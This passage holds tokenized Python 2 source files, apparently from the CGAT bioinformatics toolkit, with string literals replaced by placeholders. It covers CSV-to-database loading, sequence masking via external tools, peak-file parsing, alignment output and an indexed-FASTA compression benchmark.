<NUM_LIT:5> ) <EOL> continue <EOL> except error , msg : <EOL> E . warn ( "<STR_LIT>" % <EOL> ( tablename , str ( msg ) ) ) <EOL> dbhandle . rollback ( ) <EOL> if not retry : <EOL> raise error ( msg ) <EOL> elif tablename in existing_tables : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> else : <EOL> break <EOL> break <EOL> statement = "<STR_LIT>" % ( <EOL> tablename , "<STR_LIT:U+002CU+0020>" . join ( columns ) ) <EOL> E . debug ( "<STR_LIT>" % ( statement ) ) <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> cc = dbhandle . cursor ( ) <EOL> cc . execute ( statement ) <EOL> cc . close ( ) <EOL> dbhandle . commit ( ) <EOL> except error , msg : <EOL> E . warn ( "<STR_LIT>" % <EOL> ( msg , statement ) ) <EOL> if not retry : <EOL> raise error ( msg ) <EOL> if not re . search ( "<STR_LIT>" , str ( msg ) ) : <EOL> raise error ( "<STR_LIT>" % ( msg , statement ) ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> break <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> return take , map_column2type , ignored <EOL> def run ( infile , options , report_step = <NUM_LIT> ) : <EOL> options . tablename = quoteTableName ( <EOL> options . tablename , backend = options . backend ) <EOL> if options . map : <EOL> m = { } <EOL> for x in options . map : <EOL> f , t = x . split ( "<STR_LIT::>" ) <EOL> m [ f ] = t <EOL> options . map = m <EOL> else : <EOL> options . map = { } <EOL> existing_tables = set ( ) <EOL> quick_import_separator = "<STR_LIT:\t>" <EOL> if options . database_backend == "<STR_LIT>" : <EOL> import psycopg2 <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> dbhandle = psycopg2 . connect ( options . psql_connection ) <EOL> error = psycopg2 . Error <EOL> options . null = "<STR_LIT>" <EOL> options . string_value = "<STR_LIT>" <EOL> options . text = "<STR_LIT>" <EOL> options . index = "<STR_LIT>" <EOL> if options . insert_quick : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif options . database_backend == "<STR_LIT>" : <EOL> import MySQLdb <EOL> dbhandle = MySQLdb . connect ( host = options . database_host , <EOL> user = options . database_username , <EOL> passwd = options . database_password , <EOL> port = options . database_port , <EOL> db = options . database_name ) <EOL> error = Exception <EOL> options . null = "<STR_LIT>" <EOL> options . string_value = "<STR_LIT:%s>" <EOL> options . text = "<STR_LIT>" <EOL> options . index = "<STR_LIT>" <EOL> if options . insert_quick : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif options . backend == "<STR_LIT>" : <EOL> import sqlite3 <EOL> dbhandle = sqlite3 . connect ( options . database_name ) <EOL> try : <EOL> os . chmod ( options . database_name , <NUM_LIT:0> <NUM_LIT> ) <EOL> except OSError , msg : <EOL> E . warn ( "<STR_LIT>" % msg ) <EOL> dbhandle . text_factory = str <EOL> error = sqlite3 . OperationalError <EOL> options . insert_many = True <EOL> options . null = None <EOL> options . text = "<STR_LIT>" <EOL> options . index = "<STR_LIT>" <EOL> options . string_value = "<STR_LIT:%s>" <EOL> statement = "<STR_LIT>" <EOL> cc = executewait ( dbhandle , statement , error , options . retry ) <EOL> existing_tables = set ( [ x [ <NUM_LIT:0> ] for x in cc ] ) <EOL> cc . close ( ) <EOL> quick_import_statement = "<STR_LIT>" % ( options . database , options . tablename ) <EOL> quick_import_separator = "<STR_LIT:|>" <EOL> if options . header is not None : <EOL> options . header = [ x . strip ( ) for x in options . header . split ( "<STR_LIT:U+002C>" ) ] <EOL> if options . utf : <EOL> reader = CSV . UnicodeDictReader ( infile , <EOL> dialect = options . dialect , <EOL> fieldnames = options . header ) <EOL> else : <EOL> reader = CSV . DictReader ( infile , <EOL> dialect = options . dialect , <EOL> fieldnames = options . header ) <EOL> if options . replace_header : <EOL> try : <EOL> reader . next ( ) <EOL> except StopIteration : <EOL> pass <EOL> E . info ( "<STR_LIT>" % options . guess_size ) <EOL> rows = [ ] <EOL> for row in reader : <EOL> if None in row : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % row ) <EOL> try : <EOL> rows . append ( IOTools . convertDictionary ( row , map = options . map ) ) <EOL> except TypeError , msg : <EOL> E . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( msg , str ( row ) ) ) <EOL> except ValueError , msg : <EOL> E . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( msg , str ( row ) ) ) <EOL> if len ( rows ) >= options . guess_size : <EOL> break <EOL> E . info ( "<STR_LIT>" % len ( rows ) ) <EOL> E . info ( "<STR_LIT>" ) <EOL> if len ( rows ) == <NUM_LIT:0> : <EOL> if options . allow_empty : <EOL> if not reader . fieldnames : <EOL> E . warn ( "<STR_LIT>" ) <EOL> else : <EOL> take , map_column2type , ignored = createTable ( <EOL> dbhandle , <EOL> error , <EOL> options . tablename , <EOL> options , <EOL> retry = options . retry , <EOL> headers = reader . fieldnames , <EOL> ignore_empty = options . ignore_empty , <EOL> ignore_columns = options . ignore_columns , <EOL> rename_columns = options . rename_columns , <EOL> lowercase = options . lowercase , <EOL> ignore_duplicates = options . ignore_duplicates , <EOL> indices = options . indices , <EOL> first_column = options . first_column , <EOL> existing_tables = existing_tables , <EOL> append = options . append ) <EOL> E . info ( "<STR_LIT>" ) <EOL> return <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> take , map_column2type , ignored = createTable ( <EOL> dbhandle , <EOL> error , <EOL> options . tablename , <EOL> options , <EOL> rows = rows , <EOL> retry = options . retry , <EOL> headers = reader . fieldnames , <EOL> ignore_empty = options . ignore_empty , <EOL> ignore_columns = options . ignore_columns , <EOL> rename_columns = options . rename_columns , <EOL> lowercase = options . lowercase , <EOL> ignore_duplicates = options . ignore_duplicates , <EOL> indices = options . indices , <EOL> first_column = options . first_column , <EOL> existing_tables = existing_tables , <EOL> append = options . append ) <EOL> def row_iter ( rows , reader ) : <EOL> for row in rows : <EOL> yield quoteRow ( row , take , map_column2type , <EOL> options . missing_values , <EOL> null = options . null , <EOL> string_value = options . string_value ) <EOL> for data in reader : <EOL> yield quoteRow ( IOTools . convertDictionary ( data , map = options . map ) , <EOL> take , <EOL> map_column2type , <EOL> options . missing_values , <EOL> null = options . null , <EOL> string_value = options . string_value ) <EOL> ninput = <NUM_LIT:0> <EOL> E . info ( "<STR_LIT>" ) <EOL> if options . insert_quick : <EOL> E . info ( "<STR_LIT>" ) <EOL> outfile , filename = tempfile . mkstemp ( ) <EOL> E . debug ( "<STR_LIT>" % filename ) <EOL> for d in row_iter ( rows , reader ) : <EOL> ninput += <NUM_LIT:1> <EOL> os . write ( outfile , quick_import_separator . join ( <EOL> [ str ( d [ x ] ) for x in take ] ) + "<STR_LIT:\n>" ) <EOL> if ninput % report_step == <NUM_LIT:0> : <EOL> E . info ( "<STR_LIT>" % ninput ) <EOL> os . close ( outfile ) <EOL> statement = quick_import_statement % filename <EOL> E . debug ( statement ) <EOL> while <NUM_LIT:1> : <EOL> retcode = E . run ( statement , cwd = os . getcwd ( ) , close_fds = True ) <EOL> if retcode != <NUM_LIT:0> : <EOL> E . warn ( "<STR_LIT>" % statement ) <EOL> if not options . retry : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % statement ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> break <EOL> os . remove ( filename ) <EOL> for column in take : <EOL> executewait ( dbhandle , <EOL> "<STR_LIT>" % ( <EOL> options . tablename , column , column ) , <EOL> error , <EOL> options . retry ) <EOL> elif options . insert_many : <EOL> data = [ ] <EOL> for d in row_iter ( rows , reader ) : <EOL> ninput += <NUM_LIT:1> <EOL> data . append ( [ d [ x ] for x in take ] ) <EOL> if ninput % report_step == <NUM_LIT:0> : <EOL> E . info ( "<STR_LIT>" % ninput ) <EOL> statement = "<STR_LIT>" % ( <EOL> options . tablename , "<STR_LIT:U+002C>" . join ( "<STR_LIT:?>" * len ( take ) ) ) <EOL> E . info ( "<STR_LIT>" % len ( data ) ) <EOL> E . debug ( "<STR_LIT>" % statement ) <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> dbhandle . executemany ( statement , data ) <EOL> except error , msg : <EOL> E . warn ( "<STR_LIT>" % <EOL> ( msg , statement ) ) <EOL> if not options . retry : <EOL> raise error ( msg ) <EOL> if not re . search ( "<STR_LIT>" , str ( msg ) ) : <EOL> raise error ( msg ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> continue <EOL> break <EOL> else : <EOL> statement = "<STR_LIT>" % ( options . tablename , <EOL> '<STR_LIT>' . join ( take ) ) <EOL> for d in row_iter ( rows , reader ) : <EOL> ninput += <NUM_LIT:1> <EOL> E . debug ( "<STR_LIT>" % ( statement % d ) ) <EOL> cc = executewait ( dbhandle , statement , error , <EOL> retry = options . retry , <EOL> args = d ) <EOL> cc . close ( ) <EOL> if ninput % report_step == <NUM_LIT:0> : <EOL> E . info ( "<STR_LIT>" % ninput ) <EOL> E . info ( "<STR_LIT>" ) <EOL> nindex = <NUM_LIT:0> <EOL> for index in options . indices : <EOL> nindex += <NUM_LIT:1> <EOL> try : <EOL> statement = "<STR_LIT>" % ( <EOL> options . tablename , nindex , options . tablename , index ) <EOL> cc = executewait ( dbhandle , statement , error , options . retry ) <EOL> cc . close ( ) <EOL> E . info ( "<STR_LIT>" % ( index ) ) <EOL> except error , msg : <EOL> E . info ( "<STR_LIT>" % ( index , msg ) ) <EOL> statement = "<STR_LIT>" % ( options . tablename ) <EOL> cc = executewait ( dbhandle , statement , error , options . retry ) <EOL> result = cc . fetchone ( ) <EOL> cc . close ( ) <EOL> noutput = result [ <NUM_LIT:0> ] <EOL> E . info ( "<STR_LIT>" % <EOL> ( ninput , noutput , len ( ignored ) ) ) <EOL> dbhandle . commit ( ) <EOL> def buildParser ( ) : <EOL> parser = E . OptionParser ( <EOL> version = "<STR_LIT>" , <EOL> usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( <EOL> "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . set_defaults ( <EOL> map = [ ] , <EOL> dialect = "<STR_LIT>" , <EOL> database = "<STR_LIT>" , <EOL> lowercase = False , <EOL> tablename = "<STR_LIT>" , <EOL> from_zipped = False , <EOL> ignore_duplicates = False , <EOL> ignore_identical = False , <EOL> ignore_empty = False , <EOL> insert_many = False , <EOL> ignore_columns = [ ] , <EOL> rename_columns = [ ] , <EOL> header = None , <EOL> replace_header = False , <EOL> guess_size = <NUM_LIT:1000> , <EOL> report_step = <NUM_LIT> , <EOL> backend = "<STR_LIT>" , <EOL> indices = [ ] , <EOL> missing_values = ( "<STR_LIT>" , "<STR_LIT>" , ) , <EOL> insert_quick = False , <EOL> allow_empty = False , <EOL> retry = False , <EOL> utf = False , <EOL> append = False , <EOL> ) <EOL> return parser </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import subprocess <EOL> import tempfile <EOL> import string <EOL> import re <EOL> import random <EOL> from CGAT import Experiment as E <EOL> from CGAT import Genomics as Genomics <EOL> from CGAT import FastaIterator as FastaIterator <EOL> import cStringIO as StringIO <EOL> class Masker : <EOL> """<STR_LIT>""" <EOL> mExecutable = None <EOL> mOptions = "<STR_LIT>" <EOL> mHasPeptideMasking = False <EOL> mHasNucleicAcidMasking = False <EOL> soft_mask = False <EOL> def __init__ ( self ) : <EOL> pass <EOL> def getAlphabet ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> s1 = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence . lower ( ) ) <EOL> s2 = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence . lower ( ) ) <EOL> if float ( len ( s1 ) ) < ( len ( s2 ) * <NUM_LIT:0.1> ) : <EOL> alphabet = "<STR_LIT>" <EOL> if len ( sequence ) % <NUM_LIT:3> == <NUM_LIT:0> : <EOL> alphabet = "<STR_LIT>" <EOL> else : <EOL> alphabet = "<STR_LIT>" <EOL> return alphabet <EOL> def __call__ ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> sequence = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence ) <EOL> a = self . getAlphabet ( sequence ) <EOL> seq = list ( sequence ) <EOL> if len ( seq ) < <NUM_LIT:5> : <EOL> pass <EOL> elif a == "<STR_LIT>" and self . mHasPeptideMasking : <EOL> c = <NUM_LIT:0> <EOL> m = self . maskSequence ( sequence ) <EOL> if self . soft_mask : <EOL> m = re . sub ( "<STR_LIT>" , "<STR_LIT:x>" , m ) <EOL> for p , m in zip ( sequence , m ) : <EOL> if m in "<STR_LIT>" : <EOL> if p . isupper ( ) : <EOL> seq [ c ] = "<STR_LIT:X>" <EOL> else : <EOL> seq [ c ] = "<STR_LIT:x>" <EOL> c += <NUM_LIT:1> <EOL> elif a == "<STR_LIT>" and self . mHasPeptideMasking : <EOL> peptide_sequence = Genomics . TranslateDNA2Protein ( sequence ) <EOL> masked_sequence = self . maskSequence ( peptide_sequence ) <EOL> if self . soft_mask : <EOL> masked_sequence = re . sub ( "<STR_LIT>" , "<STR_LIT:x>" , masked_sequence ) <EOL> c = <NUM_LIT:0> <EOL> for p , m in zip ( peptide_sequence , masked_sequence ) : <EOL> if m in "<STR_LIT>" : <EOL> if p . isupper ( ) : <EOL> seq [ c : c + <NUM_LIT:3> ] = [ "<STR_LIT:N>" ] * <NUM_LIT:3> <EOL> else : <EOL> seq [ c : c + <NUM_LIT:3> ] = [ "<STR_LIT:n>" ] * <NUM_LIT:3> <EOL> c += <NUM_LIT:3> <EOL> elif a in ( "<STR_LIT>" , "<STR_LIT>" ) and self . mHasNucleicAcidMasking : <EOL> masked_sequence = self . maskSequence ( sequence ) <EOL> if self . soft_mask : <EOL> masked_sequence = re . sub ( "<STR_LIT>" , "<STR_LIT:N>" , masked_sequence ) <EOL> return masked_sequence <EOL> else : <EOL> raise ValueError ( <EOL> "<STR_LIT>" % a ) <EOL> return "<STR_LIT>" . join ( seq ) <EOL> def maskSequence ( self , peptide_sequence ) : <EOL> """<STR_LIT>""" <EOL> Masker . __init__ ( self ) <EOL> outfile , filename_peptide = tempfile . mkstemp ( ) <EOL> os . write ( outfile , "<STR_LIT>" % ( peptide_sequence ) ) <EOL> os . close ( outfile ) <EOL> infile = filename_peptide <EOL> statement = self . mCommand % locals ( ) <EOL> E . debug ( "<STR_LIT>" % statement ) <EOL> s = subprocess . Popen ( statement , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , <EOL> close_fds = True ) <EOL> ( out , err ) = s . communicate ( ) <EOL> if s . returncode != <NUM_LIT:0> : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" % <EOL> ( statement , err ) ) <EOL> os . remove ( filename_peptide ) <EOL> masked_sequence = re . sub ( <EOL> "<STR_LIT>" , "<STR_LIT>" , string . join ( out . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:1> : ] , "<STR_LIT>" ) ) <EOL> return masked_sequence <EOL> def maskSequences ( self , sequences ) : <EOL> '''<STR_LIT>''' <EOL> outfile , infile = tempfile . mkstemp ( ) <EOL> for x , s in enumerate ( sequences ) : <EOL> os . write ( outfile , "<STR_LIT>" % ( x , s ) ) <EOL> os . close ( outfile ) <EOL> statement = self . mCommand % locals ( ) <EOL> E . debug ( "<STR_LIT>" % statement ) <EOL> s = subprocess . Popen ( statement , <EOL> shell = True , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , <EOL> close_fds = True ) <EOL> ( out , err ) = s . communicate ( ) <EOL> if s . returncode != <NUM_LIT:0> : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" % <EOL> ( statement , err ) ) <EOL> result = [ <EOL> x . sequence for x in FastaIterator . iterate ( StringIO . StringIO ( out ) ) ] <EOL> os . remove ( infile ) <EOL> return result <EOL> class MaskerBias ( Masker ) : <EOL> mCommand = "<STR_LIT>" <EOL> mHasPeptideMasking = True <EOL> class MaskerSeg ( Masker ) : <EOL> mCommand = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> mHasPeptideMasking = True <EOL> soft_mask = True <EOL> class MaskerDustMasker ( Masker ) : <EOL> '''<STR_LIT>''' <EOL> mCommand = "<STR_LIT>" <EOL> mHasNucleicAcidMasking = True <EOL> class MaskerRandom ( Masker ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proportion = <NUM_LIT:10> , * args , ** kwargs ) : <EOL> Masker . __init__ ( self , * args , ** kwargs ) <EOL> self . mProportion = proportion / <NUM_LIT> <EOL> def __call__ ( self , sequence ) : <EOL> """<STR_LIT>""" <EOL> sequence = re . sub ( "<STR_LIT>" , "<STR_LIT>" , sequence ) <EOL> a = self . getAlphabet ( sequence ) <EOL> if a == "<STR_LIT>" : <EOL> frame = <NUM_LIT:3> <EOL> else : <EOL> frame = <NUM_LIT:1> <EOL> positions = [ <EOL> x for x in range ( <NUM_LIT:0> , len ( sequence ) , frame ) if sequence [ x ] != "<STR_LIT:->" ] <EOL> to_mask = random . sample ( <EOL> positions , int ( len ( positions ) * self . mProportion ) ) <EOL> print int ( len ( positions ) * self . mProportion ) <EOL> s = list ( sequence ) <EOL> print to_mask <EOL> for x in to_mask : <EOL> for y in range ( x , x + frame ) : <EOL> s [ x ] == "<STR_LIT:x>" <EOL> return "<STR_LIT>" . join ( s ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> x = MaskerRandom ( ) <EOL> print x ( "<STR_LIT>" ) <EOL> x = MaskerDustMasker ( ) <EOL> print x . maskSequences ( ( "<STR_LIT>" , <EOL> "<STR_LIT>" , ) ) <EOL> def maskSequences ( sequences , masker = None ) : <EOL> '''<STR_LIT>''' <EOL> if masker in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> masker_object = MaskerDustMasker ( ) <EOL> else : <EOL> masker_object = None <EOL> if masker == "<STR_LIT>" : <EOL> masked_seq = sequences <EOL> elif masker in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> masked_seq = masker_object . maskSequences ( <EOL> [ x . upper ( ) for x in sequences ] ) <EOL> elif masker is None : <EOL> masked_seq = [ x . upper ( ) for x in sequences ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % masker ) <EOL> masked_seq = [ re . sub ( "<STR_LIT>" , "<STR_LIT:N>" , x ) for x in masked_seq ] <EOL> return masked_seq </s>
<s> '''<STR_LIT>''' <EOL> import collections <EOL> ZinbaPeak = collections . namedtuple ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def iteratePeaks ( infile ) : <EOL> '''<STR_LIT>''' <EOL> for line in infile : <EOL> if line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> continue <EOL> if line . startswith ( "<STR_LIT:\n>" ) : <EOL> continue <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if len ( data ) != <NUM_LIT:12> : <EOL> raise ValueError ( "<STR_LIT>" % line ) <EOL> data [ <NUM_LIT:2> ] = max ( int ( data [ <NUM_LIT:2> ] ) - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> data [ <NUM_LIT:3> ] = int ( data [ <NUM_LIT:3> ] ) <EOL> data [ <NUM_LIT:5> ] = float ( data [ <NUM_LIT:5> ] ) <EOL> data [ <NUM_LIT:6> ] = max ( int ( data [ <NUM_LIT:6> ] ) - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> data [ <NUM_LIT:7> ] = int ( data [ <NUM_LIT:7> ] ) <EOL> data [ <NUM_LIT:8> ] = max ( int ( data [ <NUM_LIT:8> ] ) - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> data [ <NUM_LIT:9> ] = int ( data [ <NUM_LIT:9> ] ) <EOL> data [ <NUM_LIT:10> ] = int ( data [ <NUM_LIT:10> ] ) <EOL> data [ <NUM_LIT:11> ] = float ( data [ <NUM_LIT:11> ] ) <EOL> yield ZinbaPeak . _make ( data [ <NUM_LIT:1> : ] ) </s>
<s> """<STR_LIT>""" <EOL> import sys , re , os , tempfile <EOL> def writePairAlignment ( row , col , map_row2col ) : <EOL> """<STR_LIT>""" <EOL> tf = tempfile . TemporaryFile ( "<STR_LIT>" ) <EOL> alignlib . writePairAlignment ( tf , row , col , map_row2col ) <EOL> tf . seek ( <NUM_LIT:0> ) <EOL> r = tf . readlines ( ) <EOL> tf . close ( ) <EOL> return "<STR_LIT>" . join ( r ) <EOL> def writeAlignataCompressed ( map_row2col ) : <EOL> """<STR_LIT>""" <EOL> out = tempfile . TemporaryFile ( "<STR_LIT>" ) <EOL> alignlib . writeAlignataCompressed ( out , map_row2col ) <EOL> out . seek ( <NUM_LIT:0> ) <EOL> r = out . readline ( ) <EOL> out . close ( ) <EOL> return r . split ( "<STR_LIT:\t>" ) </s>
<s> """<STR_LIT>""" <EOL> USAGE = """<STR_LIT>""" <EOL> import tempfile <EOL> import timeit <EOL> import sys <EOL> import os <EOL> from CGAT . IndexedFasta import * <EOL> import CGAT . Stats as Stats <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import Experiment <EOL> parser = optparse . OptionParser ( version = "<STR_LIT>" , usage = globals ( ) [ "<STR_LIT>" ] ) <EOL> parser . set_defaults ( <EOL> methods = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> num_iterations = <NUM_LIT:10> , <EOL> benchmark_num_iterations = <NUM_LIT> , <EOL> fragment_sizes = ( <NUM_LIT> , <NUM_LIT> ) , <EOL> random_access_points = <NUM_LIT> , <EOL> verify_fragment_size = <NUM_LIT:100> , <EOL> verify_num_iterations = <NUM_LIT:0> , <EOL> ) <EOL> ( options , args ) = Experiment . Start ( parser ) <EOL> tempdir = tempfile . mkdtemp ( ) <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" ) <EOL> options . stdlog . flush ( ) <EOL> dbfile_uncompressed = tempdir + "<STR_LIT>" <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( dbfile_uncompressed , str ( args ) , <EOL> options . random_access_points ) , <EOL> setup = "<STR_LIT>" ) <EOL> t = timer . timeit ( number = <NUM_LIT:1> ) <EOL> options . stdout . write ( "<STR_LIT>" % ( t ) ) <EOL> dbfiles = [ ] <EOL> for compression in options . methods : <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( compression ) ) <EOL> options . stdlog . flush ( ) <EOL> dbfile = tempdir + "<STR_LIT:/>" + compression <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( dbfile , str ( args ) , <EOL> options . random_access_points , <EOL> compression ) , <EOL> setup = "<STR_LIT>" ) <EOL> t = timer . timeit ( number = <NUM_LIT:1> ) <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( compression ) ) <EOL> options . stdlog . flush ( ) <EOL> fasta = IndexedFasta ( dbfile ) <EOL> nerrors1 = verify ( IndexedFasta ( dbfile ) , IndexedFasta ( dbfile_uncompressed ) , <EOL> options . verify_num_iterations , options . verify_fragment_size , <EOL> quiet = True ) <EOL> nerrors2 = verify ( IndexedFasta ( dbfile_uncompressed ) , IndexedFasta ( dbfile ) , <EOL> options . verify_num_iterations , options . verify_fragment_size , <EOL> quiet = True ) <EOL> options . stdout . write ( "<STR_LIT>" % ( compression , t , nerrors1 , nerrors2 ) ) <EOL> options . stdout . flush ( ) <EOL> dbfiles . append ( dbfile ) <EOL> options . stdout . write ( "<STR_LIT>" ) <EOL> options . stdout . write ( "<STR_LIT>" % ( "<STR_LIT:\t>" . join ( Stats . DistributionalParameters ( ) . getHeaders ( ) ) ) ) <EOL> options . stdout . flush ( ) <EOL> for fragment_size in options . fragment_sizes : <EOL> times = [ [ ] for x in range ( len ( options . methods ) + <NUM_LIT:1> ) ] <EOL> for iteration in range ( options . num_iterations ) : <EOL> for x in range ( len ( options . methods ) ) : <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( fragment_size , iteration , options . num_iterations , options . methods [ x ] ) ) <EOL> options . stdlog . flush ( ) <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( fragment_size ) , <EOL> setup = """<STR_LIT>""" % ( dbfiles [ x ] ) ) <EOL> t = timer . timeit ( number = options . benchmark_num_iterations ) <EOL> times [ x ] . append ( t ) <EOL> if options . stdlog >= <NUM_LIT:1> : <EOL> options . stdlog . write ( "<STR_LIT>" % ( fragment_size , iteration , options . num_iterations , "<STR_LIT>" ) ) <EOL> options . stdlog . flush ( ) <EOL> timer = timeit . Timer ( stmt = "<STR_LIT>" % ( fragment_size ) , <EOL> setup = """<STR_LIT>""" % ( dbfile_uncompressed ) ) <EOL> t = timer . timeit ( number = options . benchmark_num_iterations ) <EOL> times [ - <NUM_LIT:1> ] . append ( t ) <EOL> for x in range ( len ( options . methods ) ) : <EOL> values = times [ x ] <EOL> options . stdout . write ( "<STR_LIT>" % ( options . methods [ x ] , fragment_size , str ( Stats . DistributionalParameters ( values ) ) , "<STR_LIT:U+002C>" . join ( map ( str , values ) ) ) ) <EOL> values = times [ - <NUM_LIT:1> ] <EOL> options . stdout . write ( "<STR_LIT>" % ( "<STR_LIT>" , fragment_size , str ( Stats . DistributionalParameters ( values ) ) , "<STR_LIT:U+002C>" . join ( map ( str , values ) ) ) ) <EOL> options . stdout . flush ( ) <EOL> Experiment . Stop ( ) </s>
